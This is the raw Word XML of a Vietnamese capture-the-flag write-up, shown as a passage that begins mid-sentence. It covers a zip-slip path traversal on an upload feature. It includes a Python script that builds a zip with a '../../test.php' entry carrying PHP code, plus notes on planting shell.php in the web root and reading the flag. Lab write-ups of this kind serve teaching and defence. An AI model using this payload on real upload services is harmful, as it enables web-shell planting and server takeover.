        <w:t xml:space="preserve">ạo một file nén .zip chứa một file có tên ../../shell.php. Khi file này được giải nén bởi ứng dụng, do không có cơ chế kiểm tra hoặc chuẩn hóa đường dẫn, file shell.php sẽ được ghi ra ngoài thư mục </w:t>
      </w:r>
      <w:r>
        <w:t>phiên. C</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03A8">
        <w:t>ụ thể là vào thư mục /var/www/html/upload/</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;sesion_id&gt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03A8">
        <w:t>../../shell.php, tương đương với /var/www/html/shell.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB66F4A" w14:textId="05A49E3D" w:rsidR="00AC0AFB" w:rsidRDefault="002211DC" w:rsidP="00E40C12">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E0200E" w14:textId="64D2CA37" w:rsidR="00A40D0E" w:rsidRDefault="00E475A6" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện tạo và </w:t>
      </w:r>
      <w:r w:rsidR="00E40C12">
        <w:t xml:space="preserve">nén </w:t>
      </w:r>
      <w:r>
        <w:t>file test.</w:t>
      </w:r>
      <w:r w:rsidR="00E40C12">
        <w:t>php thành test.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3652D5AE" w14:textId="077CDF85" w:rsidR="005C0701" w:rsidRDefault="005C0701" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005C0701">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C9794C2" wp14:editId="6AA56F04">
            <wp:extent cx="5731510" cy="1019175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="226736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36873" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1019175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEF2371" w14:textId="525F5116" w:rsidR="00E40C12" w:rsidRPr="005C0701" w:rsidRDefault="00E40C12" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sau đó uplaod file và khi truy cập vào, file không được thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A78A7" w14:textId="4E3460B2" w:rsidR="005C0701" w:rsidRDefault="005C0701" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A6E63CE" wp14:editId="75E46019">
            <wp:extent cx="5731510" cy="548005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="195445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51046" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="548005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E62773B" w14:textId="2FD980C5" w:rsidR="005C0701" w:rsidRDefault="00E40C12" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Để tiếp tục khai thác, mình sẽ tạo 1 file zip có tên là ../../test.php để pạy traversal giúp ghi file ra ngoài thư mục hiện tại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C2BDB9" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Code python tạo 1 file zip chứa ../ để path traversal:</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A85B87" w:rsidRPr="001107B8" w14:paraId="74AA92DC" w14:textId="77777777" w:rsidTr="001F7811">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60F50546" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D82892" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29993039" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74DBC39C" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DEC2DC3" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A44F81" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="328AF483" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D3079B" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D779C3" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0666E704" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B92845" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E4AB22A" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:lastRenderedPageBreak/>
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52A1B997" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2159C8DF" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C7BE5E3" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="082EE4E6" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A0FFE36" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22980901" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D9E255C" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>zipfile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770C0486" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>io</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23167B2C" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30800F71" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Tên file zip đầu ra</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BDD2E54" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">zip_filename = </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"payload.zip"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F4722E9" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="571308AE" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Tạo file zip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1040D25B" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> zipfile.ZipFile(zip_filename, </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'w'</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>as</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> zipf:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D2AA0D" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Tạo nội dung file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29D28905" w14:textId="0DFF33F0" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    file_content = </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>b"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A85B87">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php phpinfo();?&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CDF458F" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C7C3006" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Đường dẫn bên trong file zip (có path traversal)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="734B5568" w14:textId="28F27E22" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    zip_internal_path = </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>../</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>../</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>test.php</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C18611B" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E52190F" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Ghi nội dung vào file zip với đường dẫn tùy chỉnh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E981C87" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    zipf.writestr(zip_internal_path, file_content)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C8B5D34" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69837EF6" w14:textId="77777777" w:rsidR="00A85B87" w:rsidRPr="001107B8" w:rsidRDefault="00A85B87" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>print(</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">f"Đã tạo file zip: </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t>zip_filename</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66F7C070" w14:textId="2E844C36" w:rsidR="00E40C12" w:rsidRDefault="00E40C12" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Chuyển code vào kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A34B525" w14:textId="6C284F74" w:rsidR="00830CEE" w:rsidRDefault="00830CEE" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="617D0DB3" wp14:editId="3581BAE2">
            <wp:extent cx="5731510" cy="3340735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1286485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85259" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3340735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7372F390" w14:textId="483948E3" w:rsidR="00E40C12" w:rsidRDefault="00E40C12" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thực thi code tạo file zip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600BD6D6" w14:textId="73AC901E" w:rsidR="00E40C12" w:rsidRDefault="00830CEE" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E522BF7" wp14:editId="153C65C5">
            <wp:extent cx="5731510" cy="681355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="55065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50438" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="681355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A7A7E1" w14:textId="13A3F39D" w:rsidR="00E40C12" w:rsidRDefault="00E40C12" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Gửi và truy cập vào file zip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA727B" w14:textId="32203061" w:rsidR="00941626" w:rsidRDefault="00941626" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00941626">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17ECB75B" wp14:editId="146FC604">
            <wp:extent cx="5731510" cy="1395730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="379300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00016" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1395730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBDF0F8" w14:textId="69635232" w:rsidR="00E40C12" w:rsidRDefault="00E40C12" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả cho thấy php đã được thực thi thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57107E" w14:textId="03629398" w:rsidR="00AA6D83" w:rsidRDefault="00E40C12" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Thực hiện chỉnh sửa code php để lấy flag của bài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE2CB9" w14:textId="73D18822" w:rsidR="00AA6D83" w:rsidRPr="007510EB" w:rsidRDefault="00AA6D83" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA6D83">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="486065E1" wp14:editId="040B0D25">
            <wp:extent cx="5731510" cy="664210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="78013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7323" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="664210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AA6D83" w:rsidRPr="00751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2EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A088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D5845"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A8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22091"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58B8FA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D9E49BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E4E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007B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="720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F1D1B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5B2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F1ACE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25C07E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20B7AB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64A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B36AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6EC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570A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8198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E1A83"/>
